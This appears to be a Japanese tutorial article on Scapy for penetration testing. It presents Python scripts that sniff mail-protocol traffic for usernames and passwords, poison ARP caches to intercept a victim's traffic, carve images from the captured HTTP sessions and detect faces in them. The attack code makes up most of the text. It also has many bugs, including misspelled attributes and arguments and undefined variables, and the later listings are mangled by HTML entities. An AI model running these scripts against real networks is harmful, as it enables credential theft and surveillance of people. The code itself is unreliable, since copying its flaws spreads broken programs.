ホームページ  >  記事  >  バックエンド開発  >  Python 侵入テスト入門: Scapy ライブラリの使用方法

Python 侵入テスト入門: Scapy ライブラリの使用方法

WBOY
WBOY転載
2023-04-19 12:37:051753ブラウズ

Scapy は Python モジュールであり、基礎となるネットワーク データ パケットの解析に使用される対話型プログラムです。このプログラムは基礎となるパケット処理を抽象的にパッケージ化し、ネットワーク データ パケットの処理を非常に単純にします。このクラス ライブラリには、ネットワーク セキュリティの分野で非常に幅広い使用例があり、脆弱性悪用の開発、データ漏洩、ネットワーク監視、侵入検出、トラフィック分析とキャプチャに使用できます。 Scapy はデータの視覚化とレポート生成と統合されており、結果とデータを簡単に表示できます。

電子メール ID 認証情報を盗む

Scapy は簡潔な名前のインターフェイス関数 sniff を提供します。その定義は次のとおりです:

sniff(filter = " ", iface = "any", prn = function, count = N)

filter パラメーターを使用すると、Berkeley データ パケット フィルターを指定できます(Berkeley Packet Filter、BPF) は、Scapy によってスニッフィングされたパケットをフィルタリングするために使用されます。このパラメータを空白のままにして、すべてのパケットがスニッフィングされることを示すこともできます。

iface パラメータは、スニッファによってスニッフィングされるネットワーク カードを指定するために使用されます。設定されていない場合は、デフォルトですべてのネットワーク カードがスニッフィングされます。 prn パラメータは、コールバック関数を指定するために使用されます。フィルタリング条件を満たすパケットが見つかると、スニファはそのパケットをこのコールバック関数に渡します。これは、この関数で受け入れられる唯一のパラメータです。 count パラメータを使用して、スニッフィングするパケットの数を指定できます。空白のままにすると、Scapy はスニッフィングを続けます。

mail_sniffer.py:

from scapy.all import sniff

def packet_callback(packet):
    print(packet.show())

def main():
    sniff(pro=packet_callback, count=1)

if __name__ == '__main__':
    main()

この単純なスニファーでは、メールボックス プロトコルに関連するコマンドのみをスニッフィングします。

次に、フィルターとコールバック関数コードを追加して、電子メール アカウント認証に関連するデータを的を絞った方法でキャプチャします。

まず、パケット フィルターを設定して、スニファーが関心のあるパケットのみを表示するようにします。 BPF 構文 (Wireshark スタイル構文とも呼ばれる) を使用してフィルターを作成します。この構文は、tcpdump や Wireshark などのツールで使用できます。まず基本的な BPF 構文について説明します。 BPF 構文では、図に示すように、記述子 (特定のホスト アドレス、ネットワーク カード名、ポート番号など)、データ フローの方向、通信プロトコルの 3 種類の情報を使用できます。探しているデータに応じて、特定のタイプ、方向、プロトコルを自由に追加または省略できます。

Python 侵入テスト入門: Scapy ライブラリの使用方法

まず BPF を作成しましょう:

from scapy.all import sniff, TCP, IP

#the packet callback
def packet_callback(packet):
    if packet[TCP].payload:
        mypacket = str(packet[TCP].paylaod)
        if 'user' in mypacket.lower() or 'pass' in mypacket.lower():
            print(f"[*] Destination: {packet[IP].dst}")
            print(f"[*] {str(packet[TCP].payload)}")


def main():
    #fire up the sniffer
    sniff(filter='tcp port 110 or tcp port 25 or tcp port 143',prn=packet_callback, store=0)
#监听邮件协议常用端口
#新参数store,把它设为0以后,Scapy就不会将任何数据包保留在内存里

if __name__ == '__main__':
    main()

ARP ポイズニング攻撃

ロジック: ターゲット デバイスを騙して、自分がゲートウェイであると信じ込ませます。 ; 次に、ゲートウェイを偽装し、ターゲット デバイス宛てのすべてのトラフィックを私たちに転送する必要があることをゲートウェイに伝えます。ネットワーク上のすべてのデバイスは ARP キャッシュを維持し、最近のローカル ネットワーク上の MAC アドレスと IP アドレスの対応を記録します。この攻撃を実行するには、これらの ARP キャッシュを毒します。つまり、捏造したレコードをキャッシュに挿入します。

実験のターゲット マシンは mac であることに注意してください

arper.py:

from multiprocessing import Process
from scapy.all import (ARP, Ether, conf, get_if_hwaddr, send, sniff, sndrcv, srp, wrpcap)
import os
import sys
import time

def get_mac(targetip):
    packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op="who-has", pdst=targetip)
    resp, _= srp(packet, timeout=2, retry=10, verbose=False)
    for _, r in resp:
        return r[Ether].src
    return None
    
class Arper:
    def __init__(self, victim, gateway, interface='en0'):
        self.victim = victim
        self.victimmac = get_mac(victim)
        self.gateway = gateway
        self.gatewaymac = get_mac(gateway)
        self.interface = interface
        conf.iface = interface
        conf.verb = 0

        print(f'Initialized {interface}:')
        print(f'Gateway ({gateway}) is at {self.gateway}')
        print(f'Victim ({victim}) is at {self.gatewaymac}')
        print('_'*30)
    
    def run(self):
        self.poison_thread = Process(target=self.poison)
        self.poison_thread.start()

        self.sniff_thread = Process(target=self.sniff)
        self.sniff_thread.start()

    def poison(self):
        poison_victim = ARP()
        poison_victim.op = 2
        poison_victim.psrc = self.gateway
        poison_victim.pdst = self.victim
        poison_victim.hwdst = self.victimmac
        print(f'ip src: {poison_victim.psrc}')
        print(f'ip dst: {poison_victim.pdst}')
        print(f'mac dst: {poison_victim.hwdst}')
        print(f'mac src: {poison_victim.hwsrc}')
        print(poison_victim.summary())
        print('_'*30)
        poison_gateway = ARP()
        poison_gateway.op = 2
        poison_gateway.psrc = self,victim 
        poison_gateway.pdst = self.gateway
        poison_gateway.hwdst = self.gatewaymac

        print(f'ip src: {poison_gateway.psrc}')
        print(f'ip dst: {poison_gateway.pdst}')
        print(f'mac dst: {poison_gateway.hwdst}')
        print(f'mac_src: {poison_gateway.hwsrc}')
        print(poison_gateway.summary())
        print('_'*30)
        print(f'Beginning the ARP poison. [CTRL -C to stop]')
        while True:
            sys.stdout.write('.')
            sys.stdout.flush()
            try:
                send(poison_victim)
                send(poison_gateway)
            except KeyboardInterrupt:
                self.restore()
                sys.exit()
            else:
                time.sleep(2)


    def sniff(self, count=200):
        time.sleep(5)
        print(f'Sniffing {count} packets')
        bpf_filter = "ip host %s" % victim
        packets = sniff(count=count, filter=bpf_filter, ifcae=self.interface)
        wrpcap('arper.pcap', packets)
        print('Got the packets')
        self.restore()
        self.poison_thread.terminate()
        print('Finished')

    def restore(self):
        print('Restoring ARP tables...')
        send(ARP(
            op=2,
            psrc=self.gateway,
            hwsrc=self.gatewaymac,
            pdst=self.victim,
            hwdst='ff:ff:ff:ff:ff:ff'),
            count=5)
        send(ARP(
            op=2,
            psrc=self.victim,
            hwsrc=self.victimmac,
            pdst=self.gateway,
            hwdst='ff:ff:ff:ff:ff:ff'),
            count=5)
                

if __name__ == '__main__':
    (victim, gateway, interface) = (sys.argv[1], sys.argv[2], sys.argv[3])
    myarp = Arper(victim, gateway, interface)
    myarp.run()

pcap ファイル処理

recapper.py:

from scapy.all import TCP, rdpcap
import collections
import os
import re
import sys
import zlib

OUTDIR = '/root/Desktop/pictures'
PCAPS = '/root/Downloads'

Response = collections.namedtuple('Response', ['header','payload'])

def get_header(payload):
    try:
        header_raw = payload[:payload.index(b'\r\n\r\n')+2]
    except ValueError:
        sys.stdout.write('_')
        sys.stdout.flush()
        return None
    
    header = dict(re.findall(r&#39;?P<name>.*?): (?P<value>.*?)\r\n&#39;, header_raw.decode()))
    if &#39;Content-Type&#39; not in header:
        return None
    return header

def extract_content(Response, content_name=&#39;image&#39;):
    content, content_type = None, None
    if content_name in Response.header[&#39;Content-Type&#39;]:
        content_type = Response.header[&#39;Content-Type&#39;].split(&#39;/&#39;)[1]
        content = Response.payload[Response.payload.index(b&#39;\r\n\r\n&#39;)+4:]

        if &#39;Content-Encoding&#39; in Response.header:
            if Response.header[&#39;Content-Encoding&#39;] == "gzip":
                content = zlib.decompress(Response.payload, zlib.MAX_wbits | 32)
            elif Response.header[&#39;Content-Encoding&#39;] == "deflate":
                content = zlib.decompress(Response.payload) 
    
    return content, content_type

class Recapper:
    def __init__(self, fname):
        pcap = rdpcap(fname)
        self.session = pcap.session()
        self.responses = list()

    def get_responses(self):
        for session in self.session:
            payload = b&#39;&#39;
            for packet in self.session[session]:
                try:
                    if packet[TCP].dport == 80 or packet[TCP].sport == 80:
                        payload += bytes(packet[TCP].payload)
                except IndexError:
                    sys.stdout.write(&#39;x&#39;)
                    sys.stdout.flush()
        
            if payload:
                header = get_header(payload)
                if header is None:
                    continue
            self.responses.append(Response(header=header, payload=payload))
    def write(self, content_name):
        for i, response in enumerate(self.responses):
            content, content_type = extract_content(response, content_name)
            if content and content_type:
                fname = os.path.join(OUTDIR, f&#39;ex_{i}.{content_type}&#39;)
                print(f&#39;Writing {fname}&#39;)
                with open(fname, &#39;wb&#39;) as f:
                    f.write(content)

if __name__ == &#39;__main__&#39;:
    pfile = os.path.join(PCAPS, &#39;pcap.pcap&#39;)
    recapper = Recapper(pfile)
    recapper.get_responses()
    recapper.write(&#39;image&#39;)

写真を取得したら、その写真を分析し、各写真をチェックして顔が写っているかどうかを確認する必要があります。顔を含む画像ごとに、顔の周りにボックスを描画し、それを新しい画像として保存します。

detector.py:

import cv2
import os

ROOT = &#39;/root/Desktop/pictures&#39;
FACES = &#39;/root/Desktop/faces&#39;
TRAIN = &#39;/root/Desktop/training&#39;

def detect(srcdir=ROOT, tgtdir=FACES, train_dir=TRAIN):
    for fname in os.listdir(srcdir):
        if not fname.upper().endswith(&#39;.JPG&#39;):
            continue
        fullname = os.path.join(srcdir, fname)

        newname = os.path.join(tgtdir, fname)
        img = cv2.imread(fullname)
        if img is None:
            continue

        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        training = os.path.join(train_dir, &#39;haarcascade_frontalface_alt.xml&#39;)
        cascade = cv2.CascadeClassifier(training)
        rects = cascade.detectMultiScale(gray, 1.3,5)
        try:
            if rects.any():
                print(&#39;Got a face&#39;)
                rects[:, 2:] += rects[:, :2]
        except AttributeError:
            print(f&#39;No faces fount in {fname}&#39;)
            continue

        # highlight the faces in the image
        for x1, y1, x2, y2 in rects:
            cv2.rectangle(img, (x1, y1), (x2, y2), (127, 255, 0), 2)
        cv2.imwrite(newname, img)

if name == &#39;__main__&#39;:
    detect()

以上がPython 侵入テスト入門: Scapy ライブラリの使用方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

声明:
この記事はyisu.comで複製されています。侵害がある場合は、admin@php.cn までご連絡ください。